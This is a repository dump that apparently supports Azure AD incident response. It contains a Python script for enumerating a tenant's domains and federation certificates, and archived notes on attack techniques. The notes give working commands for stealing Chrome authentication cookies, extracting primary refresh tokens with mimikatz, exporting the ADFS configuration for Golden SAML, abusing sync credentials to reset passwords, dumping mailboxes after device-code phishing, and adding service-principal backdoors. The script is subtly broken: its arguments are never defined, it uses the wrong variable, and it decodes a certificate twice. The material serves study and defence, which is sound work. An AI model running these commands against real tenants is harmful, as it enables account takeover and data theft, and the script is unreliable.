├── azureadrecon.py
├── README-OFFENSIVETECHNIQUES.md
├── README.md
└── GraphAppPermissions.txt


/azureadrecon.py:
--------------------------------------------------------------------------------
  1 | import csv
  2 | import base64
  3 | import logging
  4 | import argparse
  5 | import traceback
  6 | import lxml.etree as etree
  7 | from io import StringIO
  8 | from urllib import request
  9 | from cryptography import x509
 10 | from urllib.parse import urlparse
 11 | from argparse import RawTextHelpFormatter
 12 | from cryptography.hazmat.backends import default_backend
 13 | 
 14 | parser = argparse.ArgumentParser(description="""
 15 | Return Azure AD tenant information, including:
 16 |     - All domains configured on the Azure AD tenant
 17 |     - The configuration of each domain (managed or federated)
 18 |     - One of two token-signing certificates configured in Azure AD for any federated domains
 19 |     - The token-signing certificates configured in ADFS for any federated domains that use ADFS
 20 | """, formatter_class=RawTextHelpFormatter)
 21 | 
 22 | args = parser.parse_args()
 23 | domain = args.domain
 24 | csv_filename = args.outfile
 25 | 
 26 | logger = logging.getLogger('Azure AD Recon')
 27 | 
 28 | logger.setLevel(logging.DEBUG)
 29 | 
 30 | logger.info("Enumerating domain %s" % domain)
 31 | 
 32 | 
 33 | def get_azuread_tenant_domains(domain):
 34 |     # Return all domains from the associated Azure AD tenant
 35 | 
 36 |     autodiscover_post_body = """<?xml version="1.0" encoding="utf-8"?>
 37 | <soap:Envelope xmlns:exm="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:ext="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:a="http://www.w3.org/2005/08/addressing" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
 38 |     <soap:Header>
 39 |         <a:Action soap:mustUnderstand="1">http://schemas.microsoft.com/exchange/2010/Autodiscover/Autodiscover/GetFederationInformation</a:Action>
 40 |         <a:To soap:mustUnderstand="1">https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc</a:To>
 41 |         <a:ReplyTo>
 42 |             <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address>
 43 |         </a:ReplyTo>
 44 |     </soap:Header>
 45 |     <soap:Body>
 46 |         <GetFederationInformationRequestMessage xmlns="http://schemas.microsoft.com/exchange/2010/Autodiscover">
 47 |             <Request>
 48 |                 <Domain>"""+ domain +"""</Domain>
 49 |             </Request>
 50 |         </GetFederationInformationRequestMessage>
 51 |     </soap:Body>
 52 | </soap:Envelope>"""
 53 | 
 54 |     autodiscover_post_headers = {
 55 |         "Content-Type" : "text/xml; charset=utf-8",
 56 |         "SOAPAction" :   '"http://schemas.microsoft.com/exchange/2010/Autodiscover/Autodiscover/GetFederationInformation"',
 57 |         "User-Agent" :   "AutodiscoverClient"
 58 |     }
 59 | 
 60 |     autodiscover_post_url = 'https://autodiscover-s.outlook.com/autodiscover/autodiscover.svc'
 61 | 
 62 |     autodiscover_request = request.Request(autodiscover_post_url,
 63 |                                            autodiscover_post_body.encode('utf-8'),
 64 |                                            autodiscover_post_headers)
 65 |     response_raw = request.urlopen(autodiscover_request)
 66 |     response_xml = etree.fromstring(response_raw.read())
 67 | 
 68 |     return response_xml.xpath("//*[local-name() = 'Domain']//text()")
 69 | 
 70 | 
 71 | def get_domain_login_information(domain):
 72 |     # Get login information for domain
 73 | 
 74 |     user_realm_url = "https://login.microsoftonline.com/getuserrealm.srf?login=" + domain + "&xml=1"
 75 |     response_raw = request.urlopen(user_realm_url).read()
 76 |     # print(response_raw)
 77 |     return etree.fromstring(response_raw)
 78 | 
 79 | 
 80 | def decode_cert(base64_cert):
 81 |     # Decode certificate
 82 | 
 83 |     return x509.load_der_x509_certificate(base64.b64decode(base64_cert),
 84 |                                           default_backend())
 85 | 
 86 | 
 87 | def get_certs_from_adfs_server(domain):
 88 |     # Get the token-signing certificates configured on the ADFS server
 89 | 
 90 |     adfs_metadata_url = domain + "/federationmetadata/2007-06/federationmetadata.xml"
 91 |     adfs_metadata_raw = request.urlopen(adfs_metadata_url).read()
 92 |     adfs_metadata_xml = etree.fromstring(adfs_metadata_raw)
 93 |     token_signing_certs = adfs_metadata_xml.xpath("//*[local-name() = 'KeyDescriptor' and @use='signing']//text()")
 94 | 
 95 |     adfs_certs = []
 96 | 
 97 |     for base64_cert in set(token_signing_certs):
 98 |         adfs_cert = decode_cert(base64_cert)
 99 | 
100 |         adfs_certs.append({
101 |             "serial" : str(cert.serial_number),
102 |             "subject" : str(cert.subject),
103 |             "before" : str(cert.not_valid_before),
104 |             "after" : str(cert.not_valid_after)
105 |         })
106 | 
107 |     return adfs_certs
108 | 
109 | 
110 | with open(csv_filename, 'w', newline='') as csvfile:
111 |     csvwriter = csv.writer(csvfile, delimiter=' ',
112 |                            quotechar='|',
113 |                            quoting=csv.QUOTE_MINIMAL)
114 | 
115 |     # get domains in the related Azure AD tenant
116 |     for domain in get_azuread_tenant_domains(domain):
117 | 
118 |         logger.info("Querying domain %s" % domain)
119 | 
120 |         # look up user realm informtion for each domain
121 |         domain_login_information = get_domain_login_information(domain)
122 | 
123 |         # is the domain managed or federated?
124 |         domain_type = domain_login_information.xpath("//NameSpaceType//text()")[0]
125 | 
126 |         if (domain_type == "Federated"):
127 | 
128 |             # 1 of 2 token signing certificates configured for the domain in Azure AD
129 |             token_signing_certs = domain_login_information.xpath("//Certificate//text()")
130 | 
131 |             assert len(token_signing_certs) == 1
132 | 
133 |             cert = decode_cert(base64.b64decode(token_signing_certs[0]))
134 | 
135 |             federation_metadata_url = domain_login_information.xpath("//MEXURL//text()")[0] \
136 |                 if domain_login_information.xpath("//MEXURL//text()") else ''
137 | 
138 |             federation_auth_url = domain_login_information.xpath("//AuthURL//text()")[0]
139 | 
140 |             # if the domain is federated with ADFS,
141 |             #    let's go and grab the token-signing certs from ADFS too
142 |             if ("adfs" in federation_auth_url):
143 | 
144 |                 federation_metdata_url_parsed = urlparse(federation_auth_url)
145 | 
146 |                 adfs_server_url = federation_metdata_url_parsed.scheme + "://" + \
147 |                                     federation_metdata_url_parsed.netloc
148 | 
149 |                 try:
150 | 
151 |                     adfs_certs = get_certs_from_adfs_server(adfs_server_url)
152 | 
153 |                     assert len(adfs_certs) <= 2
154 | 
155 |                     if (len(adfs_certs) == 2):
156 | 
157 |                         csvwriter.writerow([domain,  # Domain
158 |                                            domain_type,  # Domain type
159 |                                            federation_auth_url,  # Auth URL
160 |                                            str(cert.serial_number),  # Azure AD Cert (1/2) Serial number
161 |                                            str(cert.subject), #  Azure AD Cert (1/2) Subject
162 |                                            str(cert.not_valid_before),  # Azure AD Cert (1/2) Valid before
163 |                                            str(cert.not_valid_after),  # Azure AD Cert (1/2) Valid after
164 |                                            "Fetched ADFS URL",  # Status of fetching federation URL
165 |                                            adfs_certs[0]["serial"],  # ADFS Cert 1 Serial number
166 |                                            adfs_certs[0]["subject"],  # ADFS Cert 1 Subject number
167 |                                            adfs_certs[0]["before"],  # ADFS Cert 1 Valid before 
168 |                                            adfs_certs[0]["after"],  # ADFS Cert 1 Valid after 
169 |                                            adfs_certs[1]["serial"],  # ADFS Cert 2 Serial number
170 |                                            adfs_certs[1]["subject"],  # ADFS Cert 2 Subject
171 |                                            adfs_certs[1]["before"],  # ADFS Cert 2 Valid before 
172 |                                            adfs_certs[1]["after"]])  # ADFS Cert 2 Valid after 
173 | 
174 | 
175 |                     elif (len(adfs_certs) == 1):
176 | 
177 |                         csvwriter.writerow([domain,  # Domain
178 |                                            domain_type,  # Domain type
179 |                                            federation_auth_url,  # Auth URL
180 |                                            str(cert.serial_number),  # Azure AD Cert (1/2) Serial number
181 |                                            str(cert.subject), #  Azure AD Cert (1/2) Subject
182 |                                            str(cert.not_valid_before),  # Azure AD Cert (1/2) Valid before
183 |                                            str(cert.not_valid_after),  # Azure AD Cert (1/2) Valid after
184 |                                            "Fetched ADFS URL",  # Status of fetching federation URL
185 |                                            adfs_certs[0]["serial"],  # ADFS Cert 1 Serial number
186 |                                            adfs_certs[0]["subject"],  # ADFS Cert 1 Subject number
187 |                                            adfs_certs[0]["before"],  # ADFS Cert 1 Valid before 
188 |                                            adfs_certs[0]["after"],  # ADFS Cert 1 Valid after 
189 |                                            '',  # ADFS Cert 2 Serial number
190 |                                            '',  # ADFS Cert 2 Subject
191 |                                            '',  # ADFS Cert 2 Valid before 
192 |                                            ''])  # ADFS Cert 2 Valid after 
193 | 
194 |                     else:
195 | 
196 |                         csvwriter.writerow([domain,  # Domain
197 |                                            domain_type,  # Domain type
198 |                                            federation_auth_url,  # Auth URL
199 |                                            str(cert.serial_number),  # Azure AD Cert (1/2) Serial number
200 |                                            str(cert.subject), #  Azure AD Cert (1/2) Subject
201 |                                            str(cert.not_valid_before),  # Azure AD Cert (1/2) Valid before
202 |                                            str(cert.not_valid_after),  # Azure AD Cert (1/2) Valid after
203 |                                            "Fetched ADFS URL",  # Status of fetching federation URL
204 |                                            '',  # ADFS Cert 1 Serial number
205 |                                            '',  # ADFS Cert 1 Subject number
206 |                                            '',  # ADFS Cert 1 Valid before 
207 |                                            '',  # ADFS Cert 1 Valid after 
208 |                                            '',  # ADFS Cert 2 Serial number
209 |                                            '',  # ADFS Cert 2 Subject
210 |                                            '',  # ADFS Cert 2 Valid before 
211 |                                            ''])  # ADFS Cert 2 Valid after 
212 | 
213 | 
214 |                 except:
215 | 
216 |                     traceback.print_exc()
217 | 
218 |                     print("failed to fetch adfs url %s " % adfs_server_url)
219 | 
220 |                     csvwriter.writerow([domain,  # Domain
221 |                                         domain_type,  # Domain type
222 |                                         federation_auth_url,  # Auth URL
223 |                                         str(cert.serial_number),  # Azure AD Cert (1/2) Serial number
224 |                                         str(cert.subject), #  Azure AD Cert (1/2) Subject
225 |                                         str(cert.not_valid_before),  # Azure AD Cert (1/2) Valid before
226 |                                         str(cert.not_valid_after),  # Azure AD Cert (1/2) Valid after
227 |                                         "Failed to fetch ADFS URL",  # Status of fetching federation URL
228 |                                         '',  # ADFS Cert 1 Serial number
229 |                                         '',  # ADFS Cert 1 Subject number
230 |                                         '',  # ADFS Cert 1 Valid before 
231 |                                         '',  # ADFS Cert 1 Valid after 
232 |                                         '',  # ADFS Cert 2 Serial number
233 |                                         '',  # ADFS Cert 2 Subject
234 |                                         '',  # ADFS Cert 2 Valid before 
235 |                                         ''])  # ADFS Cert 2 Valid after 
236 | 
237 |             else:
238 | 
239 |                 csvwriter.writerow([domain,  # Domain
240 |                                     domain_type,  # Domain type
241 |                                     federation_auth_url,  # Auth URL
242 |                                     str(cert.serial_number),  # Azure AD Cert (1/2) Serial number
243 |                                     str(cert.subject), #  Azure AD Cert (1/2) Subject
244 |                                     str(cert.not_valid_before),  # Azure AD Cert (1/2) Valid before
245 |                                     str(cert.not_valid_after),  # Azure AD Cert (1/2) Valid after
246 |                                     "No parser for auth URL",  # Status of fetching federation URL
247 |                                     '',  # ADFS Cert 1 Serial number
248 |                                     '',  # ADFS Cert 1 Subject number
249 |                                     '',  # ADFS Cert 1 Valid before 
250 |                                     '',  # ADFS Cert 1 Valid after 
251 |                                     '',  # ADFS Cert 2 Serial number
252 |                                     '',  # ADFS Cert 2 Subject
253 |                                     '',  # ADFS Cert 2 Valid before 
254 |                                     ''])  # ADFS Cert 2 Valid after 
255 | 
256 |         else:
257 | 
258 |             csvwriter.writerow([domain,  # Domain
259 |                                 domain_type,  # Domain type
260 |                                 '',  # Auth URL
261 |                                 '',  # Azure AD Cert (1/2) Serial number
262 |                                 '',  # Azure AD Cert (1/2)  Subject
263 |                                 '',  # Azure AD Cert (1/2) Valid before
264 |                                 '',  # Azure AD Cert (1/2) Valid after
265 |                                 '',  # Status of fetching federation URL
266 |                                 '',  # ADFS Cert 1 Serial number
267 |                                 '',  # ADFS Cert 1 Subject number
268 |                                 '',  # ADFS Cert 1 Valid before 
269 |                                 '',  # ADFS Cert 1 Valid after 
270 |                                 '',  # ADFS Cert 2 Serial number
271 |                                 '',  # ADFS Cert 2 Subject
272 |                                 '',  # ADFS Cert 2 Valid before 
273 |                                 ''])   # ADFS Cert 2 Valid after 
274 | 
275 |         csvfile.flush()
276 | 


--------------------------------------------------------------------------------
/README-OFFENSIVETECHNIQUES.md:
--------------------------------------------------------------------------------
  1 | ## Azure AD Attack Techniques
  2 | 
  3 | Archived from README.MD. Notes from 2019 to 2021. 
  4 | 
  5 |   * [Background reading on Azure AD and authentication](#background-reading-on-azure-ad-and-authentication)
  6 |   * [Background reading on attack techniques](#background-reading-on-attack-techniques)
  7 |   * [Quick references](#quick-references)
  8 |   * [Reconnaissance against Azure AD tenants](#reconnaissance-against-azure-ad-tenants)
  9 |   * [Authenticated reconnaissance against Azure AD](#authenticated-reconnaissance-against-azure-ad)
 10 |   * [Using a compromised workstation to gain access to cloud identities and data](#using-a-compromised-workstation-to-gain-access-to-cloud-identities-and-data)
 11 |     + [Stealing the persistent authentication cookie from a compromised workstation](#stealing-the-persistent-authentication-cookie-from-a-compromised-workstation)
 12 |     + [Obtaining a refresh token from a compromised workstation](#obtaining-a-refresh-token-from-a-compromised-workstation)
 13 |     + [Stealing the primary refresh token from a compromised workstation](#stealing-the-primary-refresh-token-from-a-compromised-workstation)
 14 |     + [Dumping clear text credentials to authenticate to cloud services](#dumping-clear-text-credentials-to-authenticate-to-cloud-services)
 15 |   * [Using a compromised AD domain to gain access to cloud identities and data](#using-a-compromised-ad-domain-to-gain-access-to-cloud-identities-and-data)
 16 |     + [Stealing or modify token-signing certificates to perform a Golden SAML attack](#stealing-or-modify-token-signing-certificates-to-perform-a-golden-saml-attack)
 17 |     + [Compromising the AZUREADSSOACC account to forge Kerberos tickets](#compromising-the-azureadssoacc-account-to-forge-kerberos-tickets)
 18 |     + [Setting the password for an account in privileged cloud groups](#setting-the-password-for-an-account-in-privileged-cloud-groups)
 19 |     + [Dumping clear text credentials to accounts in privileged cloud groups](#dumping-clear-text-credentials-to-accounts-in-privileged-cloud-groups)
 20 |   * [Using a compromised cloud global admin account gain access to on-prem](#using-a-compromised-cloud-global-admin-account-gain-access-to-on-prem)
 21 |   * [Using a compromised third-party to gain access to cloud identities and data](#using-a-compromised-third-party-to-gain-access-to-cloud-identities-and-data)
 22 |   * [Using phishing attacks to gain access to cloud identities and data](#using-phishing-attacks-to-gain-access-to-cloud-identities-and-data)
 23 |     + [Consent grant phishing attack](#consent-grant-phishing-attack)
 24 |   * [Using password spraying to cloud accounts](#using-password-spraying-to-cloud-accounts)
 25 |   * [Gaining persistent access to cloud identities and data](#gaining-persistent-access-to-cloud-identities-and-data)
 26 |     + [Creating a new Service Principals to provide long-term API-based access](#creating-a-new-service-principals-to-provide-long-term-api-based-access)
 27 |     + [Adding credentials to an existing new Service Principals to provide long-term API-based access](#adding-credentials-to-an-existing-new-service-principals-to-provide-long-term-api-based-access)
 28 |     + [Configuring new or modifying existing federation trusts to perform Golden SAML attacks](#configuring-new-or-modifying-existing-federation-trusts-to-perform-golden-saml-attacks)
 29 |     + [Joining a fake device to Azure AD](#joining-a-fake-device-to-azure-ad)
 30 |     + [Dumping credentials for Azure resources](#dumping-credentials-for-azure-resources)
 31 |     + [Modify conditional access to add in MFA trusted IPs](#modify-conditional-access-to-add-in-mfa-trusted-ips)
 32 |   * [Pass the certificate](#pass-the-certificate)
 33 |   * [Hunting for backdoors](#hunting-for-backdoors)
 34 |     + [Commands to manually audit federation trusts](#commands-to-manually-audit-federation-trusts)
 35 |     + [Commands to manually audit service principals](#commands-to-manually-audit-service-principals)
 36 |       - [Review service principals with credentials](#review-service-principals-with-credentials)
 37 |     + [Review service principals with credentials and risky permissions](#review-service-principals-with-credentials-and-risky-permissions)
 38 |     + [Further hunting](#further-hunting)
 39 |   * [Notes on building a lab](#notes-on-building-a-lab)
 40 | 
 41 | ## Background reading on Azure AD and authentication 
 42 | 
 43 | * [Microsoft ITOps | OPS108: Windows authentication internals in a hybrid world](https://techcommunity.microsoft.com/t5/itops-talk-blog/ops108-windows-authentication-internals-in-a-hybrid-world/ba-p/2109557)
 44 | * [Ignite | Deep-dive: Azure Active Directory Authentication and Single-Sign-On](https://channel9.msdn.com/Events/Ignite/Microsoft-Ignite-Orlando-2017/BRK3015)
 45 | * [OAuth 2.0 and OpenID Connect](https://www.youtube.com/watch?v=996OiexHze0&ab_channel=OktaDev)
 46 | * [Microsoft Identity Platform](https://docs.microsoft.com/en-us/azure/active-directory/develop/)
 47 | * [Microsoft Identity Platform | Service principles and applications](https://docs.microsoft.com/en-us/azure/active-directory/develop/app-objects-and-service-principals)
 48 | * [Microsoft Identity Platform | OAuth2 Code flow](https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow)
 49 | * [Microsoft Identity Platform | What is a Primary Refresh Token?](https://docs.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token)
 50 | * [Microsoft 365 internals explained | Microsoft Graph, substrate, and PowerShell with Jeffrey Snover](https://www.youtube.com/watch?v=uuiTR8r27Os&ab_channel=MicrosoftMechanics)
 51 | * [Microsoft | Azure AD Authentication basics (6 videos)](https://www.youtube.com/watch?v=fbSVgC8nGz4&list=PLLasX02E8BPBm1xNMRdvP6GtA6otQUqp0&index=13&ab_channel=MicrosoftAzure)
 52 | * [Overview of the Microsoft identity platform for developers](https://www.youtube.com/watch?v=zjezqZPPOfc)
 53 | * [Detailed look at Windows Credentials](https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication?WT.mc_id=modinfra-12977-socuff)
 54 | * [Windows internals Version 7 Part 1 Chapter 7 Security](https://www.google.com/search?q=Windows+internals+Version+7+Part+1+Chapter+7&oq=Windows+internals+Version+7+Part+1+Chapter+7&aqs=chrome..69i57.211j0j4&sourceid=chrome&ie=UTF-8)
 55 | 
 56 | ## Background reading on attack techniques
 57 | * [Attacking and Defending the Microsoft Cloud](https://adsecurity.org/wp-content/uploads/2019/08/2019-BlackHat-US-Metcalf-Morowczynski-AttackingAndDefendingTheMicrosoftCloud.pdf) [Video](https://www.youtube.com/watch?v=SG2ibjuzRJM&ab_channel=BlackHat)
 58 | * [DEF CON 25 | Gerald Steere, Sean Metcalf - Hacking the Cloud](https://www.youtube.com/watch?v=LufXEPTlPak&ab_channel=DEFCONConference)
 59 | * [TR19 | I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg&ab_channel=TROOPERScon)
 60 | * [PSCONFEU 2020 | Abusing Azure Active Directory: Who would you like to be today? - Nestori Syynimaa](https://www.youtube.com/watch?v=tJkjOnxcw6w&ab_channel=PowerShellConferenceEU)
 61 | * [Blachhat 2020 | My Cloud is APTs Cloud: Attacking and Defending O365](https://i.blackhat.com/USA-20/Thursday/us-20-Bienstock-My-Cloud-Is-APTs-Cloud-Investigating-And-Defending-Office-365.pdf)
 62 | * [BlueHat Seattle 2019 | I'm in your cloud: A year of hacking Azure AD](https://www.youtube.com/watch?v=fpUZJxFK72k&ab_channel=MicrosoftSecurityResponseCenter%28MSRC%29)
 63 | * [AD Attack and Defense](https://github.com/infosecn1nja/AD-Attack-Defense)
 64 | 
 65 | ## Quick references 
 66 | 
 67 | * [Microsoft portals](https://msportals.io/)
 68 | * [Azure AD Red Team Cheat Sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)
 69 | * [Azure AD Red Team Cheat Sheet - Fork](https://github.com/rootsecdev/Azure-Red-Team)
 70 | * [Decoding JWTs](https://jwt.ms/)
 71 | 
 72 | ## Reconnaissance against Azure AD tenants
 73 | 
 74 | ```
 75 | https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
 76 | https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
 77 | https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
 78 | ```
 79 | 
 80 | ```
 81 | PS> Get-AADIntLoginInformation -Domain <DOMAIN> 
 82 | PS> Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> | Format-Table
 83 | ```
 84 | 
 85 | A python tool to look at [detailed federation information](https://github.com/WillOram/AzureAD-incident-response/blob/main/azureadrecon.py). 
 86 | 
 87 | ## Authenticated reconnaissance against Azure AD 
 88 | 
 89 | ```
 90 | roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
 91 | roadrecon gather
 92 | roadrecon gui
 93 | ```
 94 | 
 95 | ## Using a compromised workstation to gain access to cloud identities and data 
 96 | 
 97 | ### Stealing the persistent authentication cookie from a compromised workstation
 98 | 
 99 | Remote environment 
100 | 
101 | ```
102 | Copy-Item "$Env:localappdata\Google\Chrome\User Data\Default\Cookies" .\tmp\
103 | 
104 | Add-Type -AssemblyName System.Security
105 | $localState = Get-Content "$Env:localappdata\Google\Chrome\User Data\Local State" | ConvertFrom-Json
106 | $encryptedKey = [convert]::FromBase64String($localState.os_crypt.encrypted_key)
107 | $chromeMasterKey = [System.Security.Cryptography.ProtectedData]::Unprotect(($encryptedKey | Select-Object -Skip 5), $null, 'CurrentUser')
108 | [convert]::ToBase64String($chromeMasterKey) > .\tmp\chromeMasterKey
109 | ```
110 | 
111 | Local env
112 | 
113 | ```
114 | Function Convert-ByteArrayToHex {
115 |     [cmdletbinding()]
116 |     param(
117 |         [parameter(Mandatory=$true)]
118 |         [Byte[]]
119 |         $Bytes
120 |     )
121 |     $HexString = [System.Text.StringBuilder]::new($Bytes.Length * 2)
122 |     ForEach($byte in $Bytes){
123 |         $HexString.AppendFormat("{0:x2}", $byte) | Out-Null
124 |     }
125 |     $HexString.ToString()
126 | }
127 | 
128 | $base64MasterKey = Get-Content .\chromeMasterKey
129 | $encryptedKey = Convert-ByteArrayToHex ([convert]::FromBase64String($base64MasterKey))
130 | $cookiePath = (Resolve-Path Cookies).Path 
131 | .\SharpChrome.exe  cookies /target:$cookiePath /statekey:$encryptedKey /cookie:"ESTSAUTHPERSISTENT" /format:json
132 | ```
133 | 
134 | ### Obtaining a refresh token from a compromised workstation
135 | 
136 | * [Background on browser SSO](https://docs.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token#browser-sso-using-prt)
137 | * [Journey to Azure AD PRT: Getting access with pass-the-token and pass-the-cert](https://o365blog.com/post/prt/)
138 | * [Abusing Azure AD SSO with the Primary Refresh Token](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/)
139 | * [Digging further into the Primary Refresh Token](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/)
140 | * [Requests AAD Refresh Token](https://github.com/leechristensen/RequestAADRefreshToken)
141 | 
142 | Key steps (user context):
143 | * Request a PRT cookie and exchange for a (the PRT cookie expired after about 35 minutes)
144 | * Request a refresh and access token from a Public application using a OAuth2 authorization code flow (the refresh token is valid for 90 days by default)  
145 | 
146 | ### Stealing the primary refresh token from a compromised workstation 
147 | 
148 | * [Pass the PRT](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/) 
149 | 
150 | Key steps (local admin required):
151 | * Extract PRT from LSASS
152 | * Extract the Session Key and decrypt with DPAPI (TPM)
153 | * Create a PRT cookie and exchange for a session cookie 
154 | 
155 | ```
156 | dsregcmd.exe /status
157 | mimikatz.exe privilege::debug sekurlsa::cloudap
158 | token::elevate dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect
159 | ```
160 | 
161 | ### Dumping clear text credentials to authenticate to cloud services
162 | * Useful if domain account is a high-privilege cloud account
163 | * Enable WDigest with [Invoke-WdigestDowngrade.ps1](https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1)
164 | * If MFA is required credentials could potentially be used through a proxy when Conditional Access policies not configured to require MFA from trusted locations 
165 | * Check [MFASweep](https://github.com/dafthack/MFASweep)
166 | 
167 | ## Using a compromised AD domain to gain access to cloud identities and data 
168 | 
169 | ### Stealing or modify token-signing certificates to perform a Golden SAML attack
170 | 
171 | * Stealing token-signing certificates from on-premises ADFS servers to forge SAML tokens "Golden SAML" attack. 
172 | * Allows anyone with the certificate to impersonate any user to Azure AD. 
173 | * Can steal token-signing certificates to ADFS or add an alternative token-signing certificate
174 | * [Export Active Directory Federation Services (AD FS) Token Signing Certificate](https://github.com/Azure/SimuLand/blob/main/3_simulate_detect/credential-access/exportADFSTokenSigningCertificate.md)
175 | * [FireEye Azure AD backdoors](https://www.fireeye.com/blog/threat-research/2020/09/detecting-microsoft-365-azure-active-directory-backdoors.html)
176 | 
177 | Export ADFS configuration: 
178 | ```
179 | PS> $ADFS = Get-WmiObject -Namespace root/ADFS -Class SecurityTokenService  
180 | PS> $conn = $ADFS.ConfigurationDatabaseConnectionString  
181 | PS> $SQLclient = new-object System.Data.SqlClient.SqlConnection -ArgumentList $conn  
182 | PS> $SQLclient.Open()  
183 | PS> $SQLcmd = $SQLclient.CreateCommand()  
184 | PS> $SQLcmd.CommandText = "SELECT ServiceSettingsData from IdentityServerPolicy.ServiceSettings"  
185 | PS> $SQLreader = $SQLcmd.ExecuteReader()  
186 | PS> $SQLreader.Read() | Out-Null  
187 | PS> $settings=$SQLreader.GetTextReader(0).ReadToEnd()  
188 | PS> $SQLreader.Dispose()  
189 | PS> \[xml\]$xml=$settings  
190 | ```
191 | ADFSDump https://github.com/fireeye/ADFSDump
192 | 
193 | ### Compromising the AZUREADSSOACC account to forge Kerberos tickets
194 | 
195 | * [https://o365blog.com/post/on-prem_admin/](https://o365blog.com/post/on-prem_admin/)
196 | * Dump the hash for the account AZUREADSSOACC using dcsync or from NTDS.DIT
197 | * Forge Kerberos tickets for users synced with Azure AD 
198 | 
199 | ### Setting the password for an account in privileged cloud groups
200 | 
201 | * Compromise Azure AD connector account (stored in a local configuration database)
202 | * [https://o365blog.com/post/on-prem_admin/](https://o365blog.com/post/on-prem_admin/)
203 | 
204 | ```
205 | $creds = Get-AADIntSyncCredentials
206 | Get-AADIntAccessTokenForAADGraph -Credentials $creds -SaveToCache
207 | Get-AADIntSyncObjects | Select UserPrincipalName,SourceAnchor,CloudAnchor | Sort UserPrincipalName
208 | Set-AADIntUserPassword ...
209 | ```
210 | 
211 | Using a compromised AD sync accounts [I'm in your cloud tenant](https://dirkjanm.io/assets/raw/Im%20in%20your%20cloud%20bluehat-v1.0.pdf)
212 | * Dump all on-premise password hashes (if PHS is enabled)
213 | • Log in on the Azure portal (since it’s a user)
214 | • Bypass conditional access policies for admin accounts
215 | • Add credentials to service principals
216 | • Modify service principals properties
217 | • Modify/backdoor/remove conditional access policies (internal API)
218 | 
219 | ### Dumping clear text credentials to accounts in privileged cloud groups
220 | * Credential dumping and lateral movement
221 | * DCsync / NTDTS etc. 
222 | * If MFA is required credentials could potentially be used through a proxy when Conditional Access policies not configured to require MFA from trusted locations 
223 | * Check [MFASweep](https://github.com/dafthack/MFASweep)
224 | 
225 | ## Using a compromised cloud global admin account gain access to on-prem 
226 | 
227 | * [Death from above](https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d)
228 | 
229 | ## Using a compromised third-party to gain access to cloud identities and data 
230 | 
231 | * Stealing the certificates used for service principals (see the attack against Mimecast)
232 | 
233 | ## Using phishing attacks to gain access to cloud identities and data 
234 | 
235 | * [Introducing a new phishing technique for compromising Office 365 accounts](https://o365blog.com/post/phishing/)
236 | * [The art of the device code phish](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
237 | * The user code is valid only for 15 minutes
238 | 
239 | ```
240 | > Get-AzureToken -Client Graph
241 | > RefreshTo-MSGraphToken -refreshToken $response.refresh_token -domain <DOMAIN> -Device iPhone -Browser Safari
242 | > Dump-OWAMailboxViaMSGraphApi -AccessToken $MSGraphToken.access_token -mailFolder inbox -top 1 -Device iPhone -Browser Safari
243 | ```
244 | 
245 | Uses Microsoft Office client id d3590ed6-52b3-4102-aeff-aad2292ab01c
246 | 
247 | ### Consent grant phishing attack
248 | 
249 | * todo
250 | 
251 | ## Using password spraying to cloud accounts
252 | 
253 | * [MSOLSpray](https://github.com/dafthack/MSOLSpray)
254 | 
255 | ## Gaining persistent access to cloud identities and data 
256 | 
257 | ### Creating a new Service Principals to provide long-term API-based access 
258 | 
259 | ```
260 | PS> Get-AzureADServicePrincipal -all $true | Where-Object{$\_.KeyCredentials -ne $null}  
261 | PS> $sp = New-AzADServicePrincipal -DisplayName 'MicrosoftSyncShare'  
262 | PS> New-AzureADServicePrincipalKeyCredential -objectid $sp.ObjectId -EndDate "01-01-2022 12:00:00" -StartDate "01-03-2021 14:12:00" -CustomKeyIdentifier "Test" -Type AsymmetricX509Cert -Usage Verify -Value $keyValue  
263 | ```
264 | 
265 | ### Adding credentials to an existing new Service Principals to provide long-term API-based access
266 | 
267 | ```
268 | PS> $cert = New-SelfSignedCertificate -dnsname some.domain.com -CertStoreLocation cert:\LocalMachine\My -Provider “Microsoft Enhanced RSA and AES Cryptographic Provider”  
269 | PS> $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())   
270 | PS> $sp = get-azureadserviceprincipal -searchstring SEARCHSTRING  
271 | PS> New-AzureADServicePrincipalKeyCredential -objectid $sp.ObjectId -EndDate "01-01-2022 12:00:00" -StartDate "01-03-2021 14:12:00" -CustomKeyIdentifier "Test" -Type AsymmetricX509Cert -Usage Verify -Value $keyValue  
272 | PS> Connect-AzureAD  -Tenant TENANTID -ApplicationID APPID -CertificateThumbprint CERTTHUMBPRINT  
273 | ```
274 | 
275 | Creates the Azure AD audit log event "Add service principal credentials"
276 | 
277 | ```
